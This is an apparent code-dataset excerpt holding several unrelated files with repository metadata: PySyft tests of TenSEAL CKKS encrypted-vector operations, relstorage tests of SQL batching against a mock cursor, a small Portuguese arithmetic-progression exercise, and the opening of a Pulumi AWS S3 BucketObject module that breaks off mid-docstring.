packages/syft/tests/syft/lib/tenseal/tenseal_ckksvector_test.py
|
exityan/PySyft
|
35166c487a5be57f9ad28929ed88a8ba6bdd5aeb
|
[
"Apache-2.0"
] | 5
|
2020-09-11T05:47:12.000Z
|
2020-10-13T08:36:17.000Z
|
packages/syft/tests/syft/lib/tenseal/tenseal_ckksvector_test.py
|
exityan/PySyft
|
35166c487a5be57f9ad28929ed88a8ba6bdd5aeb
|
[
"Apache-2.0"
] | 1
|
2020-10-15T06:13:38.000Z
|
2020-10-15T06:13:38.000Z
|
# stdlib
from typing import Any
from typing import Sequence
# third party
import pytest
# syft absolute
import syft as sy
# syft relative
from .utils_test import decrypt
ts = pytest.importorskip("tenseal")
def _almost_equal(vec1: Sequence, vec2: Sequence, precision_pow_ten: int = 1) -> None:
upper_bound = pow(10, -precision_pow_ten)
assert pytest.approx(vec1, abs=upper_bound) == vec2
@pytest.fixture(scope="function")
def context() -> Any:
context = ts.context(
ts.SCHEME_TYPE.CKKS, 8192, coeff_mod_bit_sizes=[60, 40, 40, 60], n_threads=1
)
context.global_scale = pow(2, 40)
context.generate_galois_keys()
return context
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_sanity(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
v1 = [0, 1, 2, 3, 4]
enc_v1 = ts.ckks_vector(context, v1)
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
result = decrypt(context, enc_v1_ptr)
_almost_equal(result, [0, 1, 2, 3, 4])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_add(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
v1 = [0, 1, 2, 3, 4]
v2 = [4, 3, 2, 1, 0]
expected = [v1 + v2 for v1, v2 in zip(v1, v2)]
enc_v1 = ts.ckks_vector(context, v1)
enc_v2 = ts.ckks_vector(context, v2)
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v2_ptr = enc_v2.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
enc_v2_ptr.link_context(ctx_ptr)
# add
result_enc_ptr = enc_v1_ptr + enc_v2_ptr
result = decrypt(context, result_enc_ptr)
_almost_equal(result, expected)
# add inplace
enc_v1_ptr += enc_v2_ptr
result = decrypt(context, enc_v1_ptr)
_almost_equal(result, expected)
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_sub(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
v1 = [0, 1, 2, 3, 4]
v2 = [4, 3, 2, 1, 0]
expected = [v1 - v2 for v1, v2 in zip(v1, v2)]
enc_v1 = ts.ckks_vector(context, v1)
enc_v2 = ts.ckks_vector(context, v2)
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v2_ptr = enc_v2.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
enc_v2_ptr.link_context(ctx_ptr)
# sub
result_enc_ptr = enc_v1_ptr - enc_v2_ptr
result = decrypt(context, result_enc_ptr)
_almost_equal(result, expected)
# sub inplace
enc_v1_ptr -= enc_v2_ptr
result = decrypt(context, enc_v1_ptr)
_almost_equal(result, expected)
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_mul(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
v1 = [0, 1, 2, 3, 4]
v2 = [4, 3, 2, 1, 0]
expected = [v1 * v2 for v1, v2 in zip(v1, v2)]
enc_v1 = ts.ckks_vector(context, v1)
enc_v2 = ts.ckks_vector(context, v2)
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v2_ptr = enc_v2.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
enc_v2_ptr.link_context(ctx_ptr)
# mul
result_enc_ptr = enc_v1_ptr * enc_v2_ptr
result = decrypt(context, result_enc_ptr)
_almost_equal(result, expected)
# mul inplace
enc_v1_ptr *= enc_v2_ptr
result = decrypt(context, enc_v1_ptr)
_almost_equal(result, expected)
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_iadd(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
v1 = [0, 1, 2, 3, 4]
v2 = [4, 3, 2, 1, 0]
expected = [v1 + v2 for v1, v2 in zip(v1, v2)]
enc_v1 = ts.ckks_vector(context, v1)
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
# iadd
result_enc_ptr = enc_v1_ptr + v2
result = decrypt(context, result_enc_ptr)
_almost_equal(result, expected)
# radd
result_enc_ptr = v2 + enc_v1_ptr
result = decrypt(context, result_enc_ptr)
_almost_equal(result, expected)
# iadd inplace
enc_v1_ptr += v2
result = decrypt(context, enc_v1_ptr)
_almost_equal(result, expected)
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_isub(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
v1 = [0, 1, 2, 3, 4]
v2 = [4, 3, 2, 1, 0]
expected = [v1 - v2 for v1, v2 in zip(v1, v2)]
enc_v1 = ts.ckks_vector(context, v1)
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
# isub
result_enc_ptr = enc_v1_ptr - v2
result = decrypt(context, result_enc_ptr)
_almost_equal(result, expected)
# rsub
result_enc_ptr = v2 - enc_v1_ptr
result = decrypt(context, result_enc_ptr)
_almost_equal(result, [v2 - v1 for v1, v2 in zip(v1, v2)])
@pytest.mark.vendor(lib="tenseal")
def ptest_tenseal_ckksvector_imul(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
v1 = [0, 1, 2, 3, 4]
v2 = [4, 3, 2, 1, 0]
expected = [v1 * v2 for v1, v2 in zip(v1, v2)]
enc_v1 = ts.ckks_vector(context, v1)
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
# imul
result_enc_ptr = enc_v1_ptr * v2
result = decrypt(context, result_enc_ptr)
_almost_equal(result, expected)
# rmul
result_enc_ptr = v2 * enc_v1_ptr
result = decrypt(context, result_enc_ptr)
_almost_equal(result, expected)
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_power(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
enc_v1 = ts.ckks_vector(context, [0, 1, 2, 3, 4])
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
result_enc_ptr = enc_v1_ptr ** 3
result = decrypt(context, result_enc_ptr)
_almost_equal(result, [0, 1, 8, 27, 64])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_negation(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
enc_v1 = ts.ckks_vector(context, [1, 2, 3, 4, 5])
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
result_enc_ptr = -enc_v1_ptr
result = decrypt(context, result_enc_ptr)
_almost_equal(result, [-1, -2, -3, -4, -5])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_square(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
enc_v1 = ts.ckks_vector(context, [0, 1, 2, 3, 4])
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
result_enc_ptr = enc_v1_ptr.square()
result = decrypt(context, result_enc_ptr)
_almost_equal(result, [0, 1, 4, 9, 16])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_sum(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
enc_v1 = ts.ckks_vector(context, [0, 1, 2, 3, 4])
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
result_enc_ptr = enc_v1_ptr.sum()
result = decrypt(context, result_enc_ptr)
_almost_equal(result, [10])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_polyval(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
polynom = [1, 2, 3, 4]
enc_v1 = ts.ckks_vector(context, [-2, 2])
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
result_enc_ptr = enc_v1_ptr.polyval(polynom)
result = decrypt(context, result_enc_ptr)
_almost_equal(result, [-23, 49])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_dot(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
v1 = [0, 1, 2, 3, 4]
v2 = [4, 3, 2, 1, 0]
enc_v1 = ts.ckks_vector(context, v1)
enc_v2 = ts.ckks_vector(context, v2)
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v2_ptr = enc_v2.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
enc_v2_ptr.link_context(ctx_ptr)
result_enc_ptr2 = enc_v1_ptr.dot(enc_v2_ptr)
result = decrypt(context, result_enc_ptr2)
_almost_equal(result, [10])
# inplace
enc_v1_ptr.dot_(enc_v2_ptr)
result = decrypt(context, enc_v1_ptr)
_almost_equal(result, [10])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_matmul(
context: Any, root_client: sy.VirtualMachineClient
) -> None:
v1 = [0, 1, 2, 3, 4]
enc_v1 = ts.ckks_vector(context, v1)
ctx_ptr = context.send(root_client, pointable=True)
enc_v1_ptr = enc_v1.send(root_client, pointable=True)
enc_v1_ptr.link_context(ctx_ptr)
matrix = [
[73, 0.5, 8],
[81, -5, 66],
[-100, -78, -2],
[0, 9, 17],
[69, 11, 10],
]
# matmul
result_enc_ptr = enc_v1_ptr.matmul(matrix)
result = decrypt(context, result_enc_ptr)
_almost_equal(result, [157, -90, 153])
# mm
result_enc_ptr = enc_v1_ptr.mm(matrix)
result = decrypt(context, result_enc_ptr)
_almost_equal(result, [157, -90, 153])
# inplace
enc_v1_ptr.mm_(matrix)
result = decrypt(context, enc_v1_ptr)
_almost_equal(result, [157, -90, 153])
| 25.854167
| 86
| 0.687248
| 1,529
| 9,928
| 4.151733
| 0.083061
| 0.067738
| 0.073094
| 0.115942
| 0.883585
| 0.881537
| 0.871613
| 0.857593
| 0.852079
| 0.785444
| 0
| 0.050369
| 0.194098
| 9,928
| 383
| 87
| 25.921671
| 0.743032
| 0.016418
| 0
| 0.706612
| 0
| 0
| 0.011598
| 0
| 0
| 0
| 0
| 0
| 0.004132
| 1
| 0.066116
| false
| 0
| 0.024793
| 0
| 0.095041
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
813f2905840de6b9731c806830ee09779124e8a0
| 15,215
|
py
|
Python
|
src/relstorage/adapters/tests/test_batch.py
|
lungj/relstorage
|
e18394b0197f6b70708037f36defbd3fe3ee5137
|
[
"ZPL-2.1"
] | null | null | null |
src/relstorage/adapters/tests/test_batch.py
|
lungj/relstorage
|
e18394b0197f6b70708037f36defbd3fe3ee5137
|
[
"ZPL-2.1"
] | null | null | null |
src/relstorage/adapters/tests/test_batch.py
|
lungj/relstorage
|
e18394b0197f6b70708037f36defbd3fe3ee5137
|
[
"ZPL-2.1"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
from relstorage.tests import TestCase
from relstorage.tests import MockCursor
class RowBatcherTests(TestCase):
def getClass(self):
from relstorage.adapters.batch import RowBatcher
return RowBatcher
def test_delete_defer(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
batcher.delete_from("mytable", id=2)
self.assertEqual(cursor.executed, [])
self.assertEqual(batcher.rows_added, 1)
self.assertEqual(batcher.size_added, 0)
self.assertEqual(batcher.total_rows_inserted, 0)
self.assertEqual(batcher.total_rows_deleted, 0)
self.assertEqual(batcher.total_size_inserted, 0)
self.assertEqual(dict(batcher.deletes),
{('mytable', ('id',)): set([(2,)])})
def test_delete_multiple_column(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
batcher.delete_from("mytable", id=2, tid=10)
self.assertEqual(cursor.executed, [])
self.assertEqual(batcher.rows_added, 1)
self.assertEqual(batcher.size_added, 0)
self.assertEqual(dict(batcher.deletes),
{('mytable', ('id', 'tid')): set([(2, 10)])})
def test_delete_auto_flush(self):
cursor = MockCursor()
batcher = self.getClass()(cursor, 2)
batcher.sorted_deletes = True
batcher.delete_from("mytable", id=2)
batcher.delete_from("mytable", id=1)
self.assertEqual(cursor.executed,
[('DELETE FROM mytable WHERE id IN (%s,%s)', ((1, 2)))])
self.assertEqual(batcher.rows_added, 0)
self.assertEqual(batcher.size_added, 0)
self.assertEqual(batcher.deletes, {})
self.assertEqual(batcher.total_rows_inserted, 0)
self.assertEqual(batcher.total_rows_deleted, 2)
self.assertEqual(batcher.total_size_inserted, 0)
def test_insert_defer(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(1, 'a'),
rowkey=1,
size=3,
)
self.assertEqual(cursor.executed, [])
self.assertEqual(batcher.rows_added, 1)
self.assertEqual(batcher.size_added, 3)
self.assertEqual(batcher.inserts, {
('INSERT', 'mytable (id, name)', '%s, id || %s', ''): {1: (1, 'a')}
})
self.assertEqual(batcher.total_rows_inserted, 0)
self.assertEqual(batcher.total_rows_deleted, 0)
self.assertEqual(batcher.total_size_inserted, 0)
def test_insert_defer_multi_table(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(1, 'a'),
rowkey=1,
size=3,
)
batcher.insert_into(
"othertable (name)",
"?",
('a'),
rowkey=1,
size=1,
)
self.assertEqual(cursor.executed, [])
self.assertEqual(batcher.rows_added, 2)
self.assertEqual(batcher.size_added, 4)
self.assertEqual(dict(batcher.inserts), {
('INSERT', 'mytable (id, name)', '%s, id || %s', ''): {1: (1, 'a')},
('INSERT', 'othertable (name)', '?', ''): {1: ('a')},
})
self.assertEqual(batcher.total_rows_inserted, 0)
self.assertEqual(batcher.total_rows_deleted, 0)
self.assertEqual(batcher.total_size_inserted, 0)
def test_insert_replace(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(1, 'a'),
rowkey=1,
size=3,
command='REPLACE',
)
self.assertEqual(cursor.executed, [])
self.assertEqual(batcher.rows_added, 1)
self.assertEqual(batcher.size_added, 3)
self.assertEqual(batcher.inserts, {
('REPLACE', 'mytable (id, name)', '%s, id || %s', ''): {1: (1, 'a')}
})
def test_insert_duplicate(self):
# A second insert on the same rowkey replaces the first insert.
cursor = MockCursor()
batcher = self.getClass()(cursor)
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(1, 'a'),
rowkey=1,
size=3,
)
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(1, 'b'),
rowkey=1,
size=3,
)
self.assertEqual(cursor.executed, [])
self.assertEqual(batcher.rows_added, 2)
self.assertEqual(batcher.size_added, 6)
self.assertEqual(batcher.inserts, {
('INSERT', 'mytable (id, name)', '%s, id || %s', ''): {1: (1, 'b')}
})
def test_insert_auto_flush(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
batcher.size_limit = 10
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(1, 'a'),
rowkey=1,
size=5,
)
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(2, 'B'),
rowkey=2,
size=5,
)
self.assertEqual(
cursor.executed,
[(
'INSERT INTO mytable (id, name) VALUES\n'
'(%s, id || %s),\n'
'(%s, id || %s)\n',
(1, 'a', 2, 'B'))
])
self.assertEqual(batcher.rows_added, 0)
self.assertEqual(batcher.size_added, 0)
self.assertEqual(batcher.inserts, {})
self.assertEqual(batcher.total_rows_inserted, 2)
self.assertEqual(batcher.total_rows_deleted, 0)
self.assertEqual(batcher.total_size_inserted, 10)
def test_insert_auto_flush_multi_table(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
batcher.size_limit = 10
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(1, 'a'),
rowkey=1,
size=5,
)
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(2, 'B'),
rowkey=2,
size=5,
)
self.assertEqual(
cursor.executed,
[(
'INSERT INTO mytable (id, name) VALUES\n'
'(%s, id || %s),\n'
'(%s, id || %s)\n',
(1, 'a', 2, 'B'))
])
self.assertEqual(batcher.rows_added, 0)
self.assertEqual(batcher.size_added, 0)
self.assertEqual(batcher.inserts, {})
self.assertEqual(batcher.total_rows_inserted, 2)
self.assertEqual(batcher.total_rows_deleted, 0)
self.assertEqual(batcher.total_size_inserted, 10)
def test_flush(self):
cursor = MockCursor()
batcher = self.getClass()(cursor, delete_placeholder="?")
# Make sure we preserve order in multi-column
batcher.sorted_deletes = True
batcher.delete_from("mytable", id=1)
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(1, 'a'),
rowkey=1,
size=5,
)
batcher.delete_from("mytable", id=1, key='abc')
batcher.delete_from("mytable", id=2, key='def')
batcher.flush()
self.assertEqual(cursor.executed, [
('DELETE FROM mytable WHERE id IN (?)',
((1,))),
('DELETE FROM mytable WHERE (id=? AND key=?) OR (id=? AND key=?)',
(1, 'abc', 2, 'def')),
('INSERT INTO mytable (id, name) VALUES\n(%s, id || %s)\n',
(1, 'a')),
])
def test_select_one(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
list(batcher.select_from(('zoid', 'tid'), 'object_state', oids=(1,)))
self.assertEqual(cursor.executed, [
('SELECT zoid,tid FROM object_state WHERE oids IN (%s)',
(1,))
])
def test_select_multiple_one_batch(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
list(batcher.select_from(('zoid', 'tid'), 'object_state',
oids=(1, 2, 3, 4)))
self.assertEqual(cursor.executed, [
('SELECT zoid,tid FROM object_state WHERE oids IN (%s,%s,%s,%s)',
(1, 2, 3, 4))
])
def test_select_multiple_many_batch(self):
cursor = MockCursor()
cursor.many_results = [
[(1, 1)],
[(3, 1)],
[]
]
batcher = self.getClass()(cursor)
batcher.row_limit = 2
rows = batcher.select_from(('zoid', 'tid'), 'object_state',
oids=(1, 2, 3, 4, 5))
rows = list(rows)
self.assertEqual(cursor.executed, [
('SELECT zoid,tid FROM object_state WHERE oids IN (%s,%s)',
(1, 2,)),
('SELECT zoid,tid FROM object_state WHERE oids IN (%s,%s)',
(3, 4,)),
('SELECT zoid,tid FROM object_state WHERE oids IN (%s)',
(5,)),
])
self.assertEqual(rows, [
(1, 1),
(3, 1)
])
class OracleRowBatcherTests(TestCase):
def getClass(self):
from relstorage.adapters.oracle.batch import OracleRowBatcher
return OracleRowBatcher
def test_insert_one_row(self):
cursor = MockCursor()
batcher = self.getClass()(cursor, {})
batcher.insert_into(
"mytable (id, name)",
"%s, id || %s",
(1, 'a'),
rowkey=1,
size=3,
)
self.assertEqual(cursor.executed, [])
batcher.flush()
self.assertEqual(cursor.executed, [
('INSERT INTO mytable (id, name) VALUES (%s, id || %s)', (1, 'a')),
])
def test_insert_two_rows(self):
cursor = MockCursor()
batcher = self.getClass()(cursor, {})
batcher.insert_into(
"mytable (id, name)",
":id, :id || :name",
{'id': 1, 'name': 'a'},
rowkey=1,
size=3,
)
batcher.insert_into(
"mytable (id, name)",
":id, :id || :name",
{'id': 2, 'name': 'b'},
rowkey=2,
size=3,
)
self.assertEqual(cursor.executed, [])
batcher.flush()
self.assertEqual(
cursor.executed,
[(
'INSERT ALL\n'
'INTO mytable (id, name) VALUES (:id_0, :id_0 || :name_0)\n'
'INTO mytable (id, name) VALUES (:id_1, :id_1 || :name_1)\n'
'SELECT * FROM DUAL',
{'id_0': 1, 'id_1': 2, 'name_1': 'b', 'name_0': 'a'})
])
def test_insert_one_raw_row(self):
class MockRawType(object):
pass
cursor = MockCursor()
batcher = self.getClass()(cursor, {'rawdata': MockRawType})
batcher.insert_into(
"mytable (id, data)",
":id, :rawdata",
{'id': 1, 'rawdata': 'xyz'},
rowkey=1,
size=3,
)
batcher.flush()
self.assertEqual(cursor.executed, [
('INSERT INTO mytable (id, data) VALUES (:id, :rawdata)',
{'id': 1, 'rawdata': 'xyz'})
])
self.assertEqual(cursor.inputsizes, {'rawdata': MockRawType})
def test_insert_two_raw_rows(self):
class MockRawType(object):
pass
cursor = MockCursor()
batcher = self.getClass()(cursor, {'rawdata': MockRawType})
batcher.insert_into(
"mytable (id, data)",
":id, :rawdata",
{'id': 1, 'rawdata': 'xyz'},
rowkey=1,
size=3,
)
batcher.insert_into(
"mytable (id, data)",
":id, :rawdata",
{'id': 2, 'rawdata': 'abc'},
rowkey=2,
size=3,
)
batcher.flush()
self.assertEqual(
cursor.executed,
[(
'INSERT ALL\n'
'INTO mytable (id, data) VALUES (:id_0, :rawdata_0)\n'
'INTO mytable (id, data) VALUES (:id_1, :rawdata_1)\n'
'SELECT * FROM DUAL',
{'id_0': 1, 'id_1': 2, 'rawdata_0': 'xyz', 'rawdata_1': 'abc'})
])
self.assertEqual(cursor.inputsizes, {
'rawdata_0': MockRawType,
'rawdata_1': MockRawType,
})
class PostgreSQLRowBatcherTests(TestCase):
def getClass(self):
from relstorage.adapters.postgresql.batch import PostgreSQLRowBatcher
return PostgreSQLRowBatcher
def test_select_one(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
list(batcher.select_from(('zoid', 'tid'), 'object_state', oids=(1,)))
self.assertEqual(cursor.executed, [
('SELECT zoid,tid FROM object_state WHERE oids = ANY (%s)',
([1,],))
])
def test_select_multiple_one_batch(self):
cursor = MockCursor()
batcher = self.getClass()(cursor)
list(batcher.select_from(('zoid', 'tid'), 'object_state',
oids=(1, 2, 3, 4)))
self.assertEqual(cursor.executed, [
('SELECT zoid,tid FROM object_state WHERE oids = ANY (%s)',
([1, 2, 3, 4],))
])
def test_select_multiple_many_batch(self):
cursor = MockCursor()
cursor.many_results = [
[(1, 1)],
[(3, 1)],
[]
]
batcher = self.getClass()(cursor)
batcher.row_limit = 2
rows = batcher.select_from(('zoid', 'tid'), 'object_state',
oids=(1, 2, 3, 4, 5))
rows = list(rows)
self.assertEqual(cursor.executed, [
('SELECT zoid,tid FROM object_state WHERE oids = ANY (%s)',
([1, 2,],)),
('SELECT zoid,tid FROM object_state WHERE oids = ANY (%s)',
([3, 4,],)),
('SELECT zoid,tid FROM object_state WHERE oids = ANY (%s)',
([5,],)),
])
self.assertEqual(rows, [
(1, 1),
(3, 1)
])
| 34.038031
| 81
| 0.504174
| 1,591
| 15,215
| 4.702074
| 0.095537
| 0.142361
| 0.123513
| 0.085283
| 0.840262
| 0.815132
| 0.799091
| 0.770619
| 0.754712
| 0.717952
| 0
| 0.021474
| 0.341965
| 15,215
| 446
| 82
| 34.11435
| 0.725729
| 0.036872
| 0
| 0.743719
| 0
| 0
| 0.161005
| 0
| 0
| 0
| 0
| 0
| 0.178392
| 1
| 0.057789
| false
| 0.005025
| 0.012563
| 0
| 0.090452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d49649cd5d03a06f37e0f2dae724b4d47acba39f
| 621
|
py
|
Python
|
python--exercicios/ex051.py
|
Eliezer2000/python
|
12abb54c6536acb2f36b8f34bf51ec765857eb75
|
[
"MIT"
] | null | null | null |
python--exercicios/ex051.py
|
Eliezer2000/python
|
12abb54c6536acb2f36b8f34bf51ec765857eb75
|
[
"MIT"
] | null | null | null |
python--exercicios/ex051.py
|
Eliezer2000/python
|
12abb54c6536acb2f36b8f34bf51ec765857eb75
|
[
"MIT"
] | null | null | null |
primeiro = int(input('Primeiro termo : '))
razão = int(input('Razão : '))
décimo = primeiro + (10 -1) * razão
for c in range(primeiro, décimo + razão, razão ):
print('{}'.format(c), end='-> ')
print('ACABOU')
primeiro = int(input('Primeiro número : '))
razão = int(input('Razão : '))
décimo = primeiro + (10 - 1) * razão
for c in range(primeiro, décimo + razão, razão):
print('{}'.format(c), end=' ')
print('ACABOU')
primeiro = int(input('Primeiro número : '))
razão = int(input('Razão : '))
décimo = primeiro + (10 -1) * razão
for c in range(primeiro, décimo + razão, razão):
print('{}'.format(c), end='')
| 29.571429
| 49
| 0.613527
| 82
| 621
| 4.646341
| 0.207317
| 0.125984
| 0.125984
| 0.188976
| 0.923885
| 0.923885
| 0.923885
| 0.923885
| 0.923885
| 0.923885
| 0
| 0.01751
| 0.172303
| 621
| 20
| 50
| 31.05
| 0.723735
| 0
| 0
| 0.882353
| 0
| 0
| 0.161031
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.294118
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d4abeb50c5df2331c4176605d9b867676ac8971d
| 29,192
|
py
|
Python
|
sdk/python/pulumi_aws/s3/bucket_object.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_object.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_object.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = ['BucketObject']
class BucketObject(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_base64: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_language: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,
object_lock_mode: Optional[pulumi.Input[str]] = None,
object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,
storage_class: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
website_redirect: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Provides a S3 bucket object resource.
## Example Usage
### Encrypting with KMS Key
```python
import pulumi
import pulumi_aws as aws
examplekms = aws.kms.Key("examplekms",
description="KMS key 1",
deletion_window_in_days=7)
examplebucket = aws.s3.Bucket("examplebucket", acl="private")
examplebucket_object = aws.s3.BucketObject("examplebucketObject",
key="someobject",
bucket=examplebucket.id,
source=pulumi.FileAsset("index.html"),
kms_key_id=examplekms.arn)
```
### Server Side Encryption with S3 Default Master Key
```python
import pulumi
import pulumi_aws as aws
examplebucket = aws.s3.Bucket("examplebucket", acl="private")
examplebucket_object = aws.s3.BucketObject("examplebucketObject",
key="someobject",
bucket=examplebucket.id,
source=pulumi.FileAsset("index.html"),
server_side_encryption="aws:kms")
```
### Server Side Encryption with AWS-Managed Key
```python
import pulumi
import pulumi_aws as aws
examplebucket = aws.s3.Bucket("examplebucket", acl="private")
examplebucket_object = aws.s3.BucketObject("examplebucketObject",
key="someobject",
